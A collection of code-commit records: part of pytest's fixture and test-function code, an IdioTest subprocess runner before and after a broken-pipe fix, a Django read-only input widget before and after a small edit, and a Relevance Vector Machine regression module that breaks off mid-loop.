assert fixturedefs is not None
if not fixturedefs:
continue
# last item is expected to be the one used by the test item
write_fixture(fixturedefs[-1])
for session_item in session.items:
write_item(session_item)
def showfixtures(config):
from _pytest.main import wrap_session
return wrap_session(config, _showfixtures_main)
def _showfixtures_main(config, session):
import _pytest.config
session.perform_collect()
curdir = py.path.local()
tw = _pytest.config.create_terminal_writer(config)
verbose = config.getvalue("verbose")
fm = session._fixturemanager
available = []
seen = set()
for argname, fixturedefs in fm._arg2fixturedefs.items():
assert fixturedefs is not None
if not fixturedefs:
continue
for fixturedef in fixturedefs:
loc = getlocation(fixturedef.func, curdir)
if (fixturedef.argname, loc) in seen:
continue
seen.add((fixturedef.argname, loc))
available.append(
(
len(fixturedef.baseid),
fixturedef.func.__module__,
curdir.bestrelpath(loc),
fixturedef.argname,
fixturedef,
)
)
available.sort()
currentmodule = None
for baseid, module, bestrel, argname, fixturedef in available:
if currentmodule != module:
if not module.startswith("_pytest."):
tw.line()
tw.sep("-", "fixtures defined from {}".format(module))
currentmodule = module
if verbose <= 0 and argname[0] == "_":
continue
tw.write(argname, green=True)
if fixturedef.scope != "function":
tw.write(" [%s scope]" % fixturedef.scope, cyan=True)
if verbose > 0:
tw.write(" -- %s" % bestrel, yellow=True)
tw.write("\n")
loc = getlocation(fixturedef.func, curdir)
doc = fixturedef.func.__doc__ or ""
if doc:
write_docstring(tw, doc)
else:
tw.line(" {}: no docstring available".format(loc), red=True)
tw.line()
def write_docstring(tw, doc, indent=" "):
doc = doc.rstrip()
if "\n" in doc:
firstline, rest = doc.split("\n", 1)
else:
firstline, rest = doc, ""
if firstline.strip():
tw.line(indent + firstline.strip())
if rest:
for line in dedent(rest).split("\n"):
tw.write(indent + line + "\n")
class Function(FunctionMixin, nodes.Item):
""" a Function Item is responsible for setting up and executing a
Python test function.
"""
# disable since functions handle it themselves
_ALLOW_MARKERS = False
def __init__(
self,
name,
parent,
args=None,
config=None,
callspec=None,
callobj=NOTSET,
keywords=None,
session=None,
fixtureinfo=None,
originalname=None,
):
super().__init__(name, parent, config=config, session=session)
self._args = args
if callobj is not NOTSET:
self.obj = callobj
self.keywords.update(self.obj.__dict__)
self.own_markers.extend(get_unpacked_marks(self.obj))
if callspec:
self.callspec = callspec
# this is total hostile and a mess
# keywords are broken by design by now
# this will be redeemed later
for mark in callspec.marks:
# feel free to cry, this was broken for years before
# and keywords cant fix it per design
self.keywords[mark.name] = mark
self.own_markers.extend(normalize_mark_list(callspec.marks))
if keywords:
self.keywords.update(keywords)
# todo: this is a hell of a hack
# https://github.com/pytest-dev/pytest/issues/4569
self.keywords.update(
{
mark.name: True
for mark in self.iter_markers()
if mark.name not in self.keywords
}
)
if fixtureinfo is None:
fixtureinfo = self.session._fixturemanager.getfixtureinfo(
self, self.obj, self.cls, funcargs=True
)
self._fixtureinfo = fixtureinfo
self.fixturenames = fixtureinfo.names_closure
self._initrequest()
#: original function name, without any decorations (for example
#: parametrization adds a ``"[...]"`` suffix to function names).
#:
#: .. versionadded:: 3.0
self.originalname = originalname
def _initrequest(self):
self.funcargs = {}
self._request = fixtures.FixtureRequest(self)
@property
def function(self):
"underlying python 'function' object"
return getimfunc(self.obj)
def _getobj(self):
name = self.name
i = name.find("[") # parametrization
if i != -1:
name = name[:i]
return getattr(self.parent.obj, name)
@property
def _pyfuncitem(self):
"(compatonly) for code expecting pytest-2.2 style request objects"
return self
@property
def funcargnames(self):
""" alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
warnings.warn(FUNCARGNAMES, stacklevel=2)
return self.fixturenames
def runtest(self):
""" execute the underlying test function. """
self.ihook.pytest_pyfunc_call(pyfuncitem=self)
def setup(self):
super().setup()
fixtures.fillfixtures(self)
class FunctionDefinition(Function):
"""
internal hack until we get actual definition nodes instead of the
crappy metafunc hack
"""
def runtest(self):
raise RuntimeError("function definitions are not supposed to be used")
setup = runtest
|
# IdioTest - idiotest/proc.py
# Copyright 2009 Dietrich Epp <depp@zdome.net>
# This source code is licensed under the GNU General Public License,
# Version 3. See gpl-3.0.txt for details.
"""IdioTest process utilities.
This contains the TestProc class, which runs a program and compares
its output to the expected output. It is fairly versatile.
"""
import subprocess
from cStringIO import StringIO
import encodings.utf_8
import idiotest.fail
import difflib
def getsigdict():
import signal
d = {}
for k, v in signal.__dict__.items():
if k.startswith('SIG') and isinstance(v, int):
d[v] = k
return d
sigdict = getsigdict()
def signame(signum):
try:
name = sigdict[signum]
except KeyError:
return 'signal %i' % (signum,)
return 'signal %i (%s)' % (signum, name)
class ProcException(idiotest.fail.TestFailure):
pass
class ProcFailure(ProcException):
def __init__(self, retval):
ProcException.__init__(self, u"process returned failure (%i)" % retval)
self.retval = retval
class ProcSignal(ProcException):
def __init__(self, signal):
ProcException.__init__(self, u"process received %s" % signame(signal))
self.signal = signal
class ProcOutput(ProcException):
def __init__(self):
ProcException.__init__(self, u"incorrect output")
def write_stream(name, stream, file):
if not stream:
return
file.write(u"=== %s ===\n" % name)
try:
if not isinstance(stream, unicode):
stream = encodings.utf_8.decode(stream)[0]
except UnicodeDecodeError:
file.write(u'<invalid unicode>\n')
for line in stream.splitlines():
file.write(u' %s\n' % repr(line)[1:-1])
if stream and not stream.endswith('\n'):
file.write(u'<no newline at end of stream>\n')
else:
for line in stream.splitlines():
file.write(u' %s\n' % line)
if stream and not stream.endswith(u'\n'):
file.write(u'<no newline at end of stream>\n')
class InNone(object):
def popenarg(self):
return subprocess.PIPE
def commarg(self):
return ''
def __nonzero__(self):
return False
def decorate(self, err):
pass
class InFile(object):
def __init__(self, path):
self.path = path
def popenarg(self):
return open(self.path, 'rb')
def commarg(self):
return None
def decorate(self, err):
err.write(u"input file: %s\n" % repr(self.path))
def contents(self):
return open(self.path, 'rb').read()
class InString(object):
def __init__(self, string):
self.string = string
def popenarg(self):
return subprocess.PIPE
def commarg(self):
if isinstance(self.string, unicode):
return encodings.utf_8.encode(self.string)[0]
return self.string
def decorate(self, err):
write_stream(u'stdin', self.string, err)
def contents(self):
return self.string
def parse_input(input):
if input is None:
return InNone()
if input.startswith('@'):
return InFile(input[1:])
return InString(input)
class Proc(object):
def __init__(self, cmd, input, cwd, geterr):
self.cmd = cmd
self.input = input
self.cwd = cwd
self.error = None
self.output = None
self.geterr = geterr
def run(self):
if self.geterr:
stderr = subprocess.PIPE
else:
stderr = None
proc = subprocess.Popen(
self.cmd, cwd=self.cwd, stdin=self.input.popenarg(),
stdout=subprocess.PIPE, stderr=stderr)
output, error = proc.communicate(self.input.commarg())
retcode = proc.returncode
self.output = output
self.error = error
self.retcode = retcode
def check_signal(self):
if self.retcode < 0:
err = ProcSignal(-self.retcode)
self.decorate(err)
raise err
def check_success(self, result):
self.check_signal()
if self.retcode != result:
err = ProcFailure(self.retcode)
self.decorate(err)
raise err
def decorate(self, err):
err.write(u'command: %s\n' % ' '.join(self.cmd))
if self.cwd is not None:
err.write(u'cwd: %s\n' % self.cwd)
self.input.decorate(err)
write_stream('stderr', self.error, err)
class ProcRunner(object):
def __init__(self):
self.geterr = True
def proc(self, cmd, input, cwd):
return Proc(cmd, input, cwd, self.geterr)
def get_output(self, cmd, input=None, cwd=None, result=0):
p = self.proc(cmd, parse_input(input), cwd)
p.run()
p.check_success(result)
return p.output
def check_output(self, cmd, input=None, output=None,
cwd=None, result=0):
p = self.proc(cmd, parse_input(input), cwd)
p.run()
p.check_success(result)
output = parse_input(output).contents()
procout = p.output
if isinstance(output, unicode):
try:
procout = encodings.utf_8.decode(procout)[0]
except UnicodeDecodeError:
err = ProcOutput()
p.decorate(err)
write_stream(u'output', procout, err)
raise err
if procout != output:
err = ProcOutput()
p.decorate(err)
eout = output.splitlines(True)
pout = procout.splitlines(True)
err.write(u"=== diff ===\n")
for line in difflib.Differ().compare(eout, pout):
err.write(line)
raise err
else:
if procout != output:
err = ProcOutput()
p.decorate(err)
eout = [repr(x)+'\n' for x in output.splitlines(True)]
pout = [repr(x)+'\n' for x in procout.splitlines(True)]
err.write(u"=== diff ===\n")
for line in difflib.Differ().compare(eout, pout):
err.write(line)
raise err
class ProcWrapper(ProcRunner):
def __init__(self, wrap):
ProcRunner.__init__(self)
cmd = wrap.split()
for n, part in enumerate(cmd):
if part == '%':
self.prefix = cmd[:n]
self.suffix = cmd[n+1:]
break
else:
raise Exception("Invalid wrapper, missing %%: %s" % repr(wrap))
def proc(self, cmd, input, cwd):
cmd2 = self.prefix + cmd + self.suffix
return ProcRunner.proc(self, cmd2, input, cwd)
Fixed broken pipes.
# IdioTest - idiotest/proc.py
# Copyright 2009 Dietrich Epp <depp@zdome.net>
# This source code is licensed under the GNU General Public License,
# Version 3. See gpl-3.0.txt for details.
"""IdioTest process utilities.
This contains the TestProc class, which runs a program and compares
its output to the expected output. It is fairly versatile.
"""
import subprocess
from cStringIO import StringIO
import encodings.utf_8
import idiotest.fail
import difflib
import errno
def getsigdict():
import signal
d = {}
for k, v in signal.__dict__.items():
if k.startswith('SIG') and isinstance(v, int):
d[v] = k
return d
sigdict = getsigdict()
def signame(signum):
try:
name = sigdict[signum]
except KeyError:
return 'signal %i' % (signum,)
return 'signal %i (%s)' % (signum, name)
class ProcException(idiotest.fail.TestFailure):
pass
class ProcFailure(ProcException):
def __init__(self, retval):
ProcException.__init__(self, u"process returned failure (%i)" % retval)
self.retval = retval
class ProcSignal(ProcException):
def __init__(self, signal):
ProcException.__init__(self, u"process received %s" % signame(signal))
self.signal = signal
class ProcOutput(ProcException):
def __init__(self):
ProcException.__init__(self, u"incorrect output")
class ProcPipe(ProcException):
def __init__(self):
ProcException.__init__(self, u"process closed stdin unexpectedly")
self.retval = retval
def write_stream(name, stream, file):
if not stream:
return
file.write(u"=== %s ===\n" % name)
try:
if not isinstance(stream, unicode):
stream = encodings.utf_8.decode(stream)[0]
except UnicodeDecodeError:
file.write(u'<invalid unicode>\n')
for line in stream.splitlines():
file.write(u' %s\n' % repr(line)[1:-1])
if stream and not stream.endswith('\n'):
file.write(u'<no newline at end of stream>\n')
else:
for line in stream.splitlines():
file.write(u' %s\n' % line)
if stream and not stream.endswith(u'\n'):
file.write(u'<no newline at end of stream>\n')
class InNone(object):
def popenarg(self):
return subprocess.PIPE
def commarg(self):
return ''
def __nonzero__(self):
return False
def decorate(self, err):
pass
class InFile(object):
def __init__(self, path):
self.path = path
def popenarg(self):
return open(self.path, 'rb')
def commarg(self):
return None
def decorate(self, err):
err.write(u"input file: %s\n" % repr(self.path))
def contents(self):
return open(self.path, 'rb').read()
class InString(object):
def __init__(self, string):
self.string = string
def popenarg(self):
return subprocess.PIPE
def commarg(self):
if isinstance(self.string, unicode):
return encodings.utf_8.encode(self.string)[0]
return self.string
def decorate(self, err):
write_stream(u'stdin', self.string, err)
def contents(self):
return self.string
def parse_input(input):
if input is None:
return InNone()
if input.startswith('@'):
return InFile(input[1:])
return InString(input)
class Proc(object):
def __init__(self, cmd, input, cwd, geterr):
self.cmd = cmd
self.input = input
self.cwd = cwd
self.error = None
self.output = None
self.geterr = geterr
self.broken_pipe = False
def run(self):
if self.geterr:
stderr = subprocess.PIPE
else:
stderr = None
proc = subprocess.Popen(
self.cmd, cwd=self.cwd, stdin=self.input.popenarg(),
stdout=subprocess.PIPE, stderr=stderr)
try:
output, error = proc.communicate(self.input.commarg())
except OSError, ex:
if ex.errno == errno.EPIPE:
self.broken_pipe = True
proc.wait()
output = ''
error = ''
else:
raise
retcode = proc.returncode
self.output = output
self.error = error
self.retcode = retcode
def check_signal(self):
if self.retcode < 0:
err = ProcSignal(-self.retcode)
self.decorate(err)
raise err
def check_success(self, result):
self.check_signal()
if self.retcode != result:
err = ProcFailure(self.retcode)
self.decorate(err)
raise err
if self.broken_pipe:
err = ProcPipe()
self.decorate(err)
raise err
def decorate(self, err):
err.write(u'command: %s\n' % ' '.join(self.cmd))
if self.cwd is not None:
err.write(u'cwd: %s\n' % self.cwd)
self.input.decorate(err)
write_stream('stderr', self.error, err)
class ProcRunner(object):
def __init__(self):
self.geterr = True
def proc(self, cmd, input, cwd):
return Proc(cmd, input, cwd, self.geterr)
def get_output(self, cmd, input=None, cwd=None, result=0):
p = self.proc(cmd, parse_input(input), cwd)
p.run()
p.check_success(result)
return p.output
def check_output(self, cmd, input=None, output=None,
cwd=None, result=0):
p = self.proc(cmd, parse_input(input), cwd)
p.run()
p.check_success(result)
output = parse_input(output).contents()
procout = p.output
if isinstance(output, unicode):
try:
procout = encodings.utf_8.decode(procout)[0]
except UnicodeDecodeError:
err = ProcOutput()
p.decorate(err)
write_stream(u'output', procout, err)
raise err
if procout != output:
err = ProcOutput()
p.decorate(err)
eout = output.splitlines(True)
pout = procout.splitlines(True)
err.write(u"=== diff ===\n")
for line in difflib.Differ().compare(eout, pout):
err.write(line)
raise err
else:
if procout != output:
err = ProcOutput()
p.decorate(err)
eout = [repr(x)+'\n' for x in output.splitlines(True)]
pout = [repr(x)+'\n' for x in procout.splitlines(True)]
err.write(u"=== diff ===\n")
for line in difflib.Differ().compare(eout, pout):
err.write(line)
raise err
class ProcWrapper(ProcRunner):
def __init__(self, wrap):
ProcRunner.__init__(self)
cmd = wrap.split()
for n, part in enumerate(cmd):
if part == '%':
self.prefix = cmd[:n]
self.suffix = cmd[n+1:]
break
else:
raise Exception("Invalid wrapper, missing %%: %s" % repr(wrap))
def proc(self, cmd, input, cwd):
cmd2 = self.prefix + cmd + self.suffix
return ProcRunner.proc(self, cmd2, input, cwd)
|
from django.forms import ModelForm
from django.forms.util import flatatt
from django.forms.widgets import TextInput
from django.utils.encoding import force_unicode
from django.utils.safestring import mark_safe
from labels.models import MuseumObject
class ObjectNumberInput(TextInput):
"""
Class for managing the object_number input editability
"""
input_type = None # Subclasses must define this.
def render(self, name, value, attrs=None):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
if value != '':
# Only add the 'value' attribute if a value is non-empty.
final_attrs['value'] = force_unicode(self._format_value(value))
final_attrs['readonly'] = 'readonly'
final_attrs['style'] = 'width: 272px;'
return mark_safe(u'<input%s />' % flatatt(final_attrs))
class EditMuseumObjectForm(ModelForm):
class Meta:
model = MuseumObject
widgets = {
'object_number': ObjectNumberInput,
}
sintax
from django.forms import ModelForm
from django.forms.util import flatatt
from django.forms.widgets import TextInput
from django.utils.encoding import force_unicode
from django.utils.safestring import mark_safe
from labels.models import MuseumObject
class ObjectNumberInput(TextInput):
"""
Class for managing the object_number input editability
"""
input_type = None # Subclasses must define this.
def render(self, name, value, attrs=None):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
if value != '':
# Only add the 'value' attribute if a value is non-empty.
final_attrs['value'] = force_unicode(self._format_value(value))
final_attrs['readonly'] = 'readonly'
final_attrs['style'] = 'width: 272px;'
return mark_safe(u'<input%s />' % flatatt(final_attrs))
class EditMuseumObjectForm(ModelForm):
class Meta:
model = MuseumObject
widgets = {
'object_number' : ObjectNumberInput,
}
|
"""
scikit-learn style implementation of Relevance Vector Machine
based regression plus helper functions and example.
Eric Schmidt
e.schmidt@cantab.net
2017-10-20
"""
from __future__ import print_function
from sklearn import linear_model, utils, preprocessing
import sklearn
import numpy as np
from scipy import stats
import time
import matplotlib
import matplotlib.pylab as plt
matplotlib.rc('text', usetex=True)
matplotlib.rcParams['text.latex.preamble']=[r"\usepackage{amsmath}"]
def fun_wrapper(fun,k):
def _fun_wrapped(x):
return fun(x*k)
return _fun_wrapped
def dis_wrapper(dis):
def _dis_wrapped(x):
return dis.pdf(x)
return _dis_wrapped
def cheb_wrapper(i,k):
# i = the non-zero coefficient
# k = the number of coefficients (incl. the bias)
vec = np.zeros(k)
vec[i] = 1
def _cheb_wrapped(x):
return np.polynomial.chebyshev.chebval(x,vec)
return _cheb_wrapped
class GaussianFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
"""Generate Gaussian features.
Generate a design matrix of k Gaussians starting at mu0, separated
by dmu all with the same scale.
Parameters
----------
k : int, optional, default 10
The number of Gaussian.
mu0 : float, optional, default 0
The starting point for placing the first Gaussian.
dmu : float, optional, default 1
The increment to use separating the Gaussians.
scale : float, optional, default 1
The scale of all Gaussians.
include_bias : boolean, optional, default True
The design matrix includes a bias column if True.
Examples
--------
>>> x = np.linspace(-np.pi,np.pi,100)
>>> trafo = GaussianFeatures(k=30,mu0=-3,dmu=.2)
>>> X = trafo.fit_transform(x.reshape((-1,1)))
"""
def __init__(self,k=10,mu0=0,dmu=1.,scale=1.,include_bias=True):
self.k = k
self.mu0 = mu0
self.dmu = dmu
self.scale = scale
self.include_bias = include_bias
@staticmethod
def _basis_functions(n_features, k, include_bias, mu0, dmu, scale):
bias = np.array([lambda x: np.ones(x.shape[0])])
G = np.array([dis_wrapper(stats.norm(loc=mu0+_k*dmu,scale=scale)) for _k in range(k)])
if include_bias:
basis = np.concatenate((bias,G))
else:
basis = G
return basis
def fit(self,X,y=None):
"""
Compute number of output features.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data.
Returns
-------
self : instance
"""
n_samples, n_features = utils.check_array(X).shape
self.n_input_features_ = n_features
self.n_output_features_ = len(self._basis_functions(n_features,self.k,
self.include_bias, self.mu0, self.dmu, self.scale))
return self
def transform(self,X):
"""Applies the basis functions.
"""
sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
n_samples, n_features = X.shape
if n_features != self.n_input_features_:
raise ValueError("X shape does not match training shape")
# allocate output data
XP = np.empty((n_samples, self.n_output_features_), dtype=X.dtype)
basis = self._basis_functions(self.n_input_features_, self.k, self.include_bias,
self.mu0, self.dmu, self.scale)
for i,b in enumerate(basis):
XP[:,i] = b(X).ravel()
return XP
def fit_transform(self,X):
"""Calls fit and transform on X.
"""
self.fit(X)
return self.transform(X)
class FourierFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
"""Creates the design matrix X from x using the Fourier basis set.
"""
def __init__(self,k=10,include_bias=True):
self.k = k
self.include_bias = include_bias
@staticmethod
def _basis_functions(n_features, k, include_bias):
bias = np.array([lambda x: np.ones(x.shape[0])])
sin = np.array([fun_wrapper(np.sin,_k) for _k in range(1,k)])
cos = np.array([fun_wrapper(np.cos,_k) for _k in range(1,k)])
if include_bias:
basis = np.concatenate((bias,sin,cos))
else:
basis = np.concatenate((sin,cos))
return basis
def fit(self,X,y=None):
"""
Compute number of output features.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data.
Returns
-------
self : instance
"""
n_samples, n_features = utils.check_array(X).shape
self.n_input_features_ = n_features
self.n_output_features_ = len(self._basis_functions(n_features,self.k,self.include_bias))
return self
def transform(self,X):
"""Applies the basis functions.
"""
sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
n_samples, n_features = X.shape
if n_features != self.n_input_features_:
raise ValueError("X shape does not match training shape")
# allocate output data
XP = np.empty((n_samples, self.n_output_features_), dtype=X.dtype)
basis = self._basis_functions(self.n_input_features_,self.k,self.include_bias)
for i,b in enumerate(basis):
XP[:,i] = b(X).ravel()
return XP
def fit_transform(self,X):
"""Calls fit and transform on X.
"""
self.fit(X)
return self.transform(X)
class ChebyshevFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
"""Creates the design matrix X from x using Chebyshev polynomials.
"""
def __init__(self,k=10,include_bias=True):
self.k = k
self.include_bias = include_bias
@staticmethod
def _basis_functions(n_features, k, include_bias):
bias = np.array([lambda x: np.ones(x.shape[0])])
T = np.array([cheb_wrapper(_k,k) for _k in range(1,k)])
if include_bias:
basis = np.concatenate((bias,T))
else:
basis = T
return basis
def fit(self,X,y=None):
"""
Compute number of output features.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data.
Returns
-------
self : instance
"""
n_samples, n_features = utils.check_array(X).shape
self.n_input_features_ = n_features
self.n_output_features_ = len(self._basis_functions(n_features,self.k,self.include_bias))
return self
def transform(self,X):
"""Applies the basis functions.
"""
sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
n_samples, n_features = X.shape
if n_features != self.n_input_features_:
raise ValueError("X shape does not match training shape")
# allocate output data
XP = np.empty((n_samples, self.n_output_features_), dtype=X.dtype)
basis = self._basis_functions(self.n_input_features_,self.k,self.include_bias)
for i,b in enumerate(basis):
XP[:,i] = b(X).ravel()
return XP
def fit_transform(self,X):
"""Calls fit and transform on X.
"""
self.fit(X)
return self.transform(X)
def full_weight_vector(w, active, inactive):
"""Returns a zero-padded weights vector for RVM weights.
Parameters
----------
w : float np.ndarray of shape [n_active]
Weights vector obtained with an RVM containing only non-zero values.
active : int np.ndarray of shape [n_active]
Index vector indicating the positions of the 'w' values in the
full weights vector.
inactive : int np.ndarray of shape [n_features - n_active]
Index vector indicating the positions of 0s in the full weights
vector.
Returns
-------
w_full : float np.ndarray of shape [n_features]
Full weights vector.
"""
w_full = np.zeros(len(active)+len(inactive))
w_full[active] = w
return w_full
class RelevanceVectorMachine(linear_model.base.LinearModel,sklearn.base.RegressorMixin):
"""Relevance vector machine regression.
Fits the weights of a linear model. The weights of the model are assumed to
be normally distributed. RVMs also estimate the parameters alpha (precisions
of the distributions of the weights) and beta (precision of the distribution
of the noise) using type-II maximum likelihood or evidence maximization pruning
weights, thus leading to sparse weights vectors.
The algorithm is implemented as described by Faul and Tipping, 2003, AISTAT,
https://pdfs.semanticscholar.org/11f4/d997de8e35a1daf8b115439345d9994cfb69.pdf.
Parameters
----------
n_iter : int
maximum number of iterations
tol : float, optional, default 1.e-3
weights convergence tolerance threshold
compute_score : boolean, optional, default True
whether or not to compute mse and estimate and standard
deviation of the deviation
fit_itnercept : boolean, optional, default True
whether or not to fit the intercept
normalize : boolean, optional, default False
copy_X : boolean, optional, default True
verbose : boolean, optional, default False
init_beta : float or callable, optional, default None
if float needs to be bigger than 0
elif callable then the function needs to return a single value
init_alphas : np.ndarray list or tuple of float or callable, optional, default None
same as for init_beta but for an vector of values
do_logbook : boolean
wether or not to keep the logbook during regression:
logbook = {"L":[],"alphas":[],"beta":[],"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
"dev_est":[],"dev_std":[],"median_se":[]}
Attributes
----------
beta_ : float
noise precision
alphas_ : np.ndarray (n_features,) of float
weight precisions
active : np.ndarray (n_active,) of int
indices to places in the full weights vector to currently active weights
inactive : np.ndarray (n_active,) of int
indices to places in the full weights vector to currently inactive weights
n_iter : int
maximum number of iterations
tol : float
weight covergence tolerance
compute_score : boolean
stores mse_, dev_est and dev_std if true
mse_ : list of float
mean square errors = (t-y)**2/n_samples
dev_est : list of float
estimate of deviation = (t-y)/n_samples
dev_std : list of float
one standard deviation of the deviatons = np.std(t-y,ddof=1)
sigma_ : np.ndarray (n_features,n_features) of float
contains the posterior covariance matrix of p(t|Xw,beta)*p(w|alphas)
do_logbook : boolean
logbook : dict of lists
Example
-------
>>> from linear_model import RelevanceVectorMachine
>>> from sklearn import preprocessing
>>> import numpy as np
>>> from scipy import stats
>>> x = np.linspace(-np.pi,np.pi,100)
>>> x_pred = np.linspace(-np.pi,np.pi,200)
>>> epsilon = stats.norm(loc=0,scale=0.01)
>>> t = np.exp(-x**2) + epsilon.rvs(size=x.shape[0])
>>> k = 5
>>> trafo = preprocessing.PolynomialFeatures(k)
>>> X = trafo.fit_transform(x.reshape((-1,1)))
>>> init_beta = 1./ np.var(t) # (that's the default start)
>>> init_alphas = np.ones(X.shape[1])
>>> init_alphas[1:] = np.inf
>>> model = RelevanceVectorMachine(n_iter=50,verbose=False,compute_score=True,init_beta=init_beta,
... init_alphas=init_alphas)
>>> model.fit(X,t)
RelevanceVectorMachine(compute_score=True, copy_X=True, fit_intercept=True,
init_alphas=array([ 1., inf, inf, inf, inf, inf]),
init_beta=8.2821399938358535, n_iter=50, normalize=False,
tol=0.001, verbose=False)
>>> y, yerr = model.predict(X,return_std=True)
Notes
-----
The notation here is adopted from Tipping 2001, Faul and Tipping 2003 and Bishop's "Pattern
Recognition and Machine Learning" book. No jumping in the sewer!
References
----------
Mike Tipping's favorite implementation: http://www.miketipping.com/downloads.htm
David MacKay's 1992, Bayesian Interpolation
http://www.utstat.toronto.edu/~rsalakhu/sta4273/notes/Lecture2.pdf
http://statweb.stanford.edu/~tibs/sta305files/Rudyregularization.pdf -> Ridge regression and SVD
http://www.statisticshowto.com/wp-content/uploads/2017/07/lecture-notes.pdf -> Ridge regression and SVD and Woodbury
"""
def __init__(self, n_iter=300, tol=1.e-3, compute_score=False,
fit_intercept=False, normalize=False, copy_X=True,
verbose=False,init_beta=None,init_alphas=None,do_logbook=False):
self.n_iter = n_iter
self.tol = tol
self.compute_score = compute_score
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.verbose = verbose
self.init_beta = init_beta
self.init_alphas = init_alphas
self.mse_ = []
self.dev_est = [] # deviation estimate
self.dev_std = [] # deviation standard deviation
self.do_logbook = do_logbook
self.logbook = {"L":[],"alphas":[],"beta":[],"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
"dev_est":[],"dev_std":[],"median_se":[]}
@staticmethod
def _initialize_beta(y,init_beta=None,verbose=False):
beta_ = 1. / np.var(y) # default
if not init_beta is None:
if callable(init_beta):
if verbose: print("Setting beta_ = init_beta()")
beta_ = init_beta()
assert beta_ > 0., "init_beta() produced an invalid beta_ value = {}".format(beta_)
elif isinstance(init_beta,(int,float)):
if verbose: print("Setting beta_ = init_beta")
beta_ = np.copy(init_beta)
else:
raise ValueError("Do not understand self.init_beta = {}".format(init_beta))
else:
if verbose:
print("Setting default beta_ = 1/var(t)")
return beta_
@staticmethod
def _initialize_alphas(X,init_alphas=None,verbose=False):
n_samples, n_features = X.shape
alphas_ = np.ones(n_features) # default
alphas_[1:] = np.inf # setting all but one basis function as inactive (see Faul and Tipping 2003 p.4)
if not init_alphas is None:
if callable(init_alphas):
if verbose: print("Setting alphas_ = init_alphas()")
alphas_ = init_alphas(X)
assert (alphas_ > 0.).all(), "init_alphas() produced an invalid alphas_ array = {}".format(alphas_)
elif isinstance(init_alphas,(list,tuple,np.ndarray)):
if verbose: print("Setting alphas_ = init_alphas")
alphas_ = np.copy(init_alphas)
else:
raise ValueError("Do not understand self.init_alphas = {}".format(init_alphas))
else:
if verbose:
print("Setting default alphas_ = [1,inf,inf,...]")
return alphas_
def fit(self, X, y):
"""Fit the model
Parameters
----------
X : numpy array of shape [n_samples,n_features]
Training data
y : numpy array of shape [n_samples]
Target values. Will be cast to X's dtype if necessary
Returns
-------
self : returns an instance of self.
"""
self.mse_ = []
self.dev_est = []
self.dev_std = []
X, y = utils.check_X_y(X, y, dtype=np.float64, y_numeric=True)
X, y, X_offset_, y_offset_, X_scale_ = self._preprocess_data(
X, y, self.fit_intercept, self.normalize, self.copy_X)
self.X_offset_ = X_offset_
self.X_scale_ = X_scale_
n_samples, n_features = X.shape
verbose = self.verbose
# Initialization of the hyperparameters
beta_ = self._initialize_beta(y,init_beta=self.init_beta,verbose=self.verbose)
alphas_ = self._initialize_alphas(X,init_alphas=self.init_alphas,verbose=self.verbose)
self.scores_ = list()
coef_old_ = None
XT_y = np.dot(X.T, y)
# Convergence loop of the RVM regression
for iter_ in range(self.n_iter):
# (in-)active basis functions
active = np.where(np.isfinite(alphas_))[0]
n_active = active.shape[0]
inactive = np.where(np.isinf(alphas_))[0]
# corresponding Sigma matrix (weights hyperprior covariance matrix)
Sigma = np.diag(alphas_)
Sigma_a = np.diag(alphas_[active]) # active part of Sigma -> numpy select?
X_a = X[:,active] # active part of the design matrix
# weights posterior mean (w_new) and covariance (A_new)
A_new = np.linalg.inv(beta_ * X_a.T.dot(X_a) + Sigma_a)
w_new = beta_ * A_new.dot(X_a.T.dot(y))
# mse
dt = y - np.dot(X_a, w_new)
mse_ = np.sum((dt) ** 2)
# Recompute beta
beta_ = (n_features - n_active + np.sum(alphas_[active]*np.diag(A_new)))
beta_ /= mse_
# Compute objective function: Gaussian for p(w|X,t,alphas,beta) \propto p(t|Xw,beta)p(w|alphas)
if self.compute_score:
log_prefactor = n_features*(beta_ - 2.*np.pi) - alphas_[active].sum() - 2.*np.pi
log_likelihood = -beta_ * mse_
log_prior = - w_new.T.dot(Sigma_a.dot(w_new))
log_posterior = .5 * (log_prefactor + log_likelihood + log_prior)
self.scores_.append(log_posterior)
self.mse_.append(float(mse_/n_samples))
self.dev_est.append(dt.mean())
self.dev_std.append(dt.std(ddof=1))
if self.do_logbook:
logbook = {"L":[],"alphas":[],"beta":[],
"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
"dev_est":[],"dev_std":[],"median_se":[]}
if self.compute_score:
self.logbook["L"].append(self.scores_[-1])
else:
log_prefactor = n_features*(beta_ - 2.*np.pi) - alphas_[active].sum() - 2.*np.pi
log_likelihood = -beta_ * mse_
log_prior = - w_new.T.dot(Sigma_a.dot(w_new))
log_posterior = .5 * (log_prefactor + log_likelihood + log_prior)
self.logbook["L"].append(log_posterior)
self.logbook["alphas"].append(alphas_)
self.logbook["beta"].append(beta_)
self.logbook["weights"].append(w_new)
self.logbook["weights_full"].append(full_weight_vector(w_new,active,inactive))
self.logbook["mse"].append(mse_/n_samples)
self.logbook["tse"].append(mse_)
self.logbook["min"].append(np.amin(dt))
self.logbook["max"].append(np.amax(dt))
self.logbook["dev_est"].append(dt.mean())
self.logbook["dev_std"].append(dt.std())
self.logbook["median_se"].append(np.median(dt))
# Check for convergence
